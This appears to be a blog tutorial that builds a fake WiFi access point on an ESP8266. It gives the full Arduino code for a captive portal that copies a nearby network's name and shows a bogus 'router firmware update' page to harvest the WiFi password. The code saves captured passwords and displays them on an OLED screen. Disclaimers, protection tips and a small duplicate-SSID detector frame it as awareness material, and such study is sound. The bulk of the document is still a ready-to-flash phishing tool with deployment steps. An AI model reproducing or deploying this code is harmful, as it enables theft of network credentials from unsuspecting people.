How to Know WiFi Password Using ESP8266
Description:
How to Know WiFi Password Using ESP8266 – In this article, I am going to demonstrate how to retrieve WiFi passwords using the ESP8266 WiFi module. But before we get started, let me tell you.
Disclaimer:
This article is for educational purposes only. I do not promote or encourage any illegal activities, including phishing or hacking. Any techniques or methods discussed are intended to be used responsibly and ethically. Always respect others’ privacy and obtain proper permission before accessing any networks or devices. Remember, unauthorized access to WiFi networks or personal information is against the law and can have serious consequences. Please use the information in this article wisely!
A few days ago, I used a web portal to change the SSID and password on my ESP32 wirelessly. I not only saved the router’s WiFi credentials in the EEPROM, but I also managed to access those WiFi credentials from the EEPROM.
Right at this moment, an exciting idea came to my mind. I realized that someone could potentially retrieve the WiFi password of a nearby WiFi router or mobile hotspot. So, I decided to test this in a controlled environment to demonstrate how such a security vulnerability works and to show you how to protect yourself from it.
Remember, this is an educational demonstration meant to raise awareness about WiFi security.
So, without any further delay, let’s get started!
First, let me explain how this works. When you go to manage Wi-Fi connections, you see a list of available networks. The top-most network, “Engr Fahad,” is the SSID of my WiFi router that I am currently connected to.
Two other networks, “Fawad” and “SherAlam,” are visible but not connected. Both networks show a lock icon, indicating they require a password. “Fawad” is the SSID of my brother’s mobile hotspot, and “SherAlam” is the SSID of my neighbor’s WiFi router.
For this demonstration, I created another WiFi network with the same SSID as my brother’s hotspot, “Fawad.” This can trick someone into clicking on the wrong network and entering their credentials, showing how attackers might exploit such vulnerabilities.
Let me stress again – never use this on someone’s network without their permission. It’s illegal and unethical.
Anyway, I am going to explain how attackers make a fake WiFi network using the ESP8266. They can also use an ESP32 or a Raspberry Pi Pico; there are many WiFi-capable controller boards out there. But let's focus on how they create a fake WiFi network. You should know about this.
ESP8266 Board Installation in the Arduino IDE:
I am using the Nodemcu ESP8266 again after a few months, and I am not sure if the ESP8266 is still available in the boards list.
You can see the ESP8266 is not available in the boards list. I have used it a lot, but for the last few months I have been using the ESP32 for all my IoT-based projects.
Anyway, to install the ESP8266 in the Arduino IDE, open this article: “Nodemcu ESP8266 Arduino IDE Board Manager URL Link Installation and First Project”.
In this article, I have explained pretty much everything; if you are just getting started with the ESP8266, then you should read it.
Anyway, you need to copy this URL link.
http://arduino.esp8266.com/stable/package_esp8266com_index.json
Go back to the Arduino IDE, open the File menu, and then go to Preferences.
Now,
- Go to the Tools Menu, then Board, and click on the Boards Manager.
- In the Search box, type esp8266.
- Install ESP8266 by ESP8266 Community. It's going to take several minutes depending on the speed of your internet connection.
As you can see the ESP8266 package has been successfully installed and you can clearly see all the Boards included in this package. Now, let’s go ahead and confirm if the ESP8266 boards are available in the boards list.
So, let’s go to the Tools Menu and then to Board; you can see the ESP8266 boards have been successfully installed.
I am going to connect my Nodemcu ESP8266 WiFi Module to the Laptop and then I can go ahead and upload this program.
Nodemcu ESP8266 Programming:
// How to Know WiFi Password Using ESP8266 // Libraries #include <ESP8266WiFi.h> #include <DNSServer.h> #include <ESP8266WebServer.h> #include <EEPROM.h> #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> // Default SSID name const char* SSID_NAME = "Fawad"; // OLED display settings #define SCREEN_WIDTH 128 #define SCREEN_HEIGHT 64 #define OLED_RESET -1 // Reset pin (not used) Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, OLED_RESET); // Default main strings #define SUBTITLE "Router info." #define TITLE "Update" #define BODY "Your router firmware is out of date. Update your firmware to continue browsing normally." #define POST_TITLE "Updating..." #define POST_BODY "Your router is being updated. Please, wait until the process finishes.</br>Thank you." #define PASS_TITLE "Passwords" #define CLEAR_TITLE "Cleared" // Init system settings const byte HTTP_CODE = 200; const byte DNS_PORT = 53; const byte TICK_TIMER = 1000; IPAddress APIP(192, 1, 1, 1); // Gateway String allPass = ""; String newSSID = ""; String currentSSID = ""; // For storing passwords in EEPROM. int initialCheckLocation = 20; // Location to check whether the ESP is running for the first time. int passStart = 30; // Starting location in EEPROM to save password. int passEnd = passStart; // Ending location in EEPROM to save password. 
unsigned long bootTime = 0, lastActivity = 0, lastTick = 0, tickCtr = 0; DNSServer dnsServer; ESP8266WebServer webServer(80); String input(String argName) { String a = webServer.arg(argName); a.replace("<", "<"); a.replace(">", ">"); a.substring(0, 200); return a; } String footer() { return "</div><div class=q><a>© All rights reserved.</a></div>"; } String header(String t) { String a = String(currentSSID); String CSS = "article { background: #f2f2f2; padding: 1.3em; }" "body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }" "div { padding: 0.5em; }" "h1 { margin: 0.5em 0 0 0; padding: 0.5em; }" "input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }" "label { color: #333; display: block; font-style: italic; font-weight: bold; }" "nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }" "nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } " "textarea { width: 100%; }"; String h = "<!DOCTYPE html><html>" "<head><title>" + a + " :: " + t + "</title>" "<meta name=viewport content=\"width=device-width,initial-scale=1\">" "<style>" + CSS + "</style>" "<meta charset=\"UTF-8\"></head>" "<body><nav><b>" + a + "</b> " + SUBTITLE + "</nav><div><h1>" + t + "</h1></div><div>"; return h; } String index() { return header(TITLE) + "<div>" + BODY + "</ol></div><div><form action=/post method=post><label>WiFi password:</label>" + "<input type=password name=m></input><input type=submit value=Start></form>" + footer(); } String posted() { String pass = input("m"); pass = "<li><b>" + pass + "</li></b>"; // Adding password in an ordered list. allPass += pass; // Updating the full passwords. // Storing passwords to EEPROM. for (int i = 0; i <= pass.length(); ++i) { EEPROM.write(passEnd + i, pass[i]); // Adding password to existing password in EEPROM. 
} passEnd += pass.length(); // Updating end position of passwords in EEPROM. EEPROM.write(passEnd, '\0'); EEPROM.commit(); return header(POST_TITLE) + POST_BODY + footer(); } String pass() { return header(PASS_TITLE) + "<ol>" + allPass + "</ol><br><center><p><a style=\"color:blue\" href=/>Back to Index</a></p><p><a style=\"color:blue\" href=/clear>Clear passwords</a></p></center>" + footer(); } String ssid() { return header("Change SSID") + "<p>Here you can change the SSID name. After pressing the button \"Change SSID\" you will lose the connection, so reconnect to the new SSID.</p>" + "<form action=/postSSID method=post><label>New SSID name:</label>" + "<input type=text name=s></input><input type=submit value=\"Change SSID\"></form>" + footer(); } String postedSSID() { String postedSSID = input("s"); newSSID = "<li><b>" + postedSSID + "</b></li>"; for (int i = 0; i < postedSSID.length(); ++i) { EEPROM.write(i, postedSSID[i]); } EEPROM.write(postedSSID.length(), '\0'); EEPROM.commit(); WiFi.softAP(postedSSID); return header("SSID Changed") + "<p>The SSID has been changed to: " + postedSSID + "</p>" + footer(); } String clear() { allPass = ""; passEnd = passStart; // Setting the password end location -> starting position. EEPROM.write(passEnd, '\0'); EEPROM.commit(); return header(CLEAR_TITLE) + "<div><p>The password list has been reseted.</div></p><center><a style=\"color:blue\" href=/>Back to Index</a></center>" + footer(); } void BLINK() { // The built-in LED will blink 5 times after a password is posted. for (int counter = 0; counter < 10; counter++) { // For blinking the LED. 
digitalWrite(BUILTIN_LED, counter % 2); delay(500); } } void setup() { // Serial begin Serial.begin(115200); bootTime = lastActivity = millis(); EEPROM.begin(512); delay(10); // Initialize the OLED display display.begin(SSD1306_SWITCHCAPVCC, 0x3C); // Address 0x3D for 128x64 display.clearDisplay(); display.setTextSize(1); display.setTextColor(SSD1306_WHITE); // Check whether the ESP is running for the first time. String checkValue = "first"; // This will be set in EEPROM after the first run. for (int i = 0; i < checkValue.length(); ++i) { if (char(EEPROM.read(i + initialCheckLocation)) != checkValue[i]) { // Add "first" in initialCheckLocation. for (int i = 0; i < checkValue.length(); ++i) { EEPROM.write(i + initialCheckLocation, checkValue[i]); } EEPROM.write(0, '\0'); // Clear SSID location in EEPROM. EEPROM.write(passStart, '\0'); // Clear password location in EEPROM EEPROM.commit(); break; } } // Read EEPROM SSID String ESSID; int i = 0; while (EEPROM.read(i) != '\0') { ESSID += char(EEPROM.read(i)); i++; } // Reading stored password and end location of passwords in the EEPROM. while (EEPROM.read(passEnd) != '\0') { allPass += char(EEPROM.read(passEnd)); // Reading the stored password in EEPROM. passEnd++; // Updating the end location of password in EEPROM. } WiFi.mode(WIFI_AP); WiFi.softAPConfig(APIP, APIP, IPAddress(255, 255, 255, 0)); // Setting currentSSID -> SSID in EEPROM or default one. currentSSID = ESSID.length() > 1 ? 
ESSID.c_str() : SSID_NAME; Serial.print("Current SSID: "); Serial.println(currentSSID); WiFi.softAP(currentSSID); // Start the AP dnsServer.start(DNS_PORT, "*", APIP); // DNS server for Captive Portal webServer.on("/", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", index()); }); webServer.on("/post", HTTP_POST, []() { webServer.send(HTTP_CODE, "text/html", posted()); BLINK(); // Blink LED }); webServer.on("/pass", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", pass()); }); webServer.on("/ssid", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", ssid()); }); webServer.on("/postSSID", HTTP_POST, []() { webServer.send(HTTP_CODE, "text/html", postedSSID()); }); webServer.on("/clear", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", clear()); }); webServer.begin(); Serial.println("Server started."); } void loop() { dnsServer.processNextRequest(); webServer.handleClient(); // Update the OLED display every second if (millis() - lastTick >= TICK_TIMER) { lastTick = millis(); display.clearDisplay(); display.setCursor(0, 0); display.println("Current SSID:"); display.println(currentSSID); display.println("Passwords:"); display.println(allPass); display.display(); } } |
I actually downloaded this code from GitHub and slightly modified it to make it work with my setup. I also added code for the SSD1306 OLED display module, so I also installed these two libraries.
#include <Adafruit_GFX.h>
#include <Adafruit_SSD1306.h>
Let me show you how to install these libraries in the Arduino IDE.
Copy the Library name.
Go to the Sketch Menu then to Include Library, and click on the Manage Libraries.
Paste the library name in the search box.
You can see I have already installed this library. Next, search for the SSD1306 library.
I have also installed this library.
// Default SSID name
const char* SSID_NAME = "Fawad";
This is my brother’s WiFi hotspot name, which I have set as the SSID for the network I created. I could leave it empty or write something else – I am not worried about this because I can change the SSID wirelessly at any time, without hard-coding.
#define BODY "Your router firmware is out of date. Update your firmware to continue browsing normally."
The web portal will display a message asking him to update his router firmware – something that looks natural but is actually part of the trick.
I have already uploaded this program and now let me show you how this works in practice.
Now, you can see two networks with the same name, “Fawad,” in the list – one is the actual network, and the other is the fake network I created. Let me connect to this network to show you how the web portal actually looks on a laptop.
You can see the SSID and the update message. This looks so real. So, if you see something like this do not enter your password. Here is how it looks on a cell phone.
When someone connects to the fake WiFi network and enters the password, it’s saved in the ESP8266’s EEPROM.
You might wonder how I will know if my brother has entered the password. When the password is entered, the onboard LED will blink five times to notify me. I could also add a buzzer; however, to make it more user-friendly, I have added an I2C-supported SSD1306 OLED display module to show the password directly on the screen.
You can follow this circuit diagram.
On the Nodemcu ESP8266 WiFi module D1 is the SCL and D2 is the SDA.
Now, there is no need to place this board in front of me, and I don’t need to keep checking the web portal either.
If he enters the password, it will be displayed on the OLED display module.
I have been waiting for several hours for my brother to enter the password, but he didn’t fall for it since he knew this trick. For the sake of demonstration, I eventually asked him to connect to this WiFi network, so you all could see how it actually works.
Finally, my brother connected to the fake WiFi network and entered his password. The password appeared on the OLED display, and I successfully completed the test.
Now, let’s check the password on the web portal. In the code, there is an IP address.
192.1.1.1
If you go to this IP address and add /pass, you can check the password.
You can also clear the entered password. It not only clears the password from the web portal but also from the EEPROM.
If you want to change the SSID, you can simply type /ssid and enter a new SSID name.
I ran this demonstration in a controlled environment using my own WiFi networks, including a hotspot I set up with my brother’s name, “Fawad”. I made up the story to illustrate how attackers could steal your WiFi credentials if you are not careful.
Always ensure that the network you connect to is the correct one. If you see a duplicate SSID, do not enter your WiFi credentials.
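The duplicate-SSID check can be automated. The sketch above starts its access point with WiFi.softAP(currentSSID) and no passphrase, so the copy is an open network while the real one is password protected. The following is an added example, not code from the original article: standard C++ that flags any SSID seen both open and encrypted in one scan. The ScanEntry and Seen structs, the function names, the BSSIDs and the "Office" network are assumptions constructed for illustration.

```cpp
#include <iostream>
#include <map>
#include <set>
#include <string>
#include <vector>

// One row of a WiFi scan result. Field names are assumptions for this example.
struct ScanEntry {
    std::string ssid;
    std::string bssid;  // MAC address of the access point
    bool encrypted;     // false = open network, no password needed to join
};

// BSSIDs seen for one SSID, split by whether the AP requires a password.
struct Seen {
    std::set<std::string> open, secured;
};

// Returns every SSID advertised by an encrypted AP and by an open AP in the
// same scan. Several APs sharing one SSID with the same security setting
// (a normal multi-AP network) are not flagged.
std::vector<std::string> findSuspectSsids(const std::vector<ScanEntry>& scan) {
    std::map<std::string, Seen> bySsid;
    for (const auto& e : scan) {
        if (e.ssid.empty()) continue;  // hidden network: no name to compare
        Seen& s = bySsid[e.ssid];
        (e.encrypted ? s.secured : s.open).insert(e.bssid);
    }
    std::vector<std::string> suspects;
    for (const auto& kv : bySsid)
        if (!kv.second.open.empty() && !kv.second.secured.empty())
            suspects.push_back(kv.first);
    return suspects;
}

// Constructed sample scan modelled on the network list in the article.
std::vector<ScanEntry> sampleScan() {
    return {{"Engr Fahad", "02:00:00:00:00:01", true},
            {"Fawad", "02:00:00:00:00:02", true},    // real hotspot
            {"Fawad", "02:00:00:00:00:03", false},   // open copy of the name
            {"SherAlam", "02:00:00:00:00:04", true},
            {"Office", "02:00:00:00:00:05", true},   // two APs, same security
            {"Office", "02:00:00:00:00:06", true}};
}

int main() {
    for (const auto& ssid : findSuspectSsids(sampleScan()))
        std::cout << "Do not enter credentials: duplicate SSID " << ssid << "\n";
}
```

A portal page that asks for the WiFi password itself after you join an open network is the second warning sign; a real router never needs that password typed into a web form to let you browse.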
This technique should only be used for entering WiFi credentials wirelessly on the ESP8266 or ESP32 for legitimate purposes, such as IoT setups. Never use it to exploit someone else’s network.
I hope this article helps you understand how attackers can exploit WiFi networks and how to protect yourself. Remember, the goal is to educate and raise awareness, not to cause harm.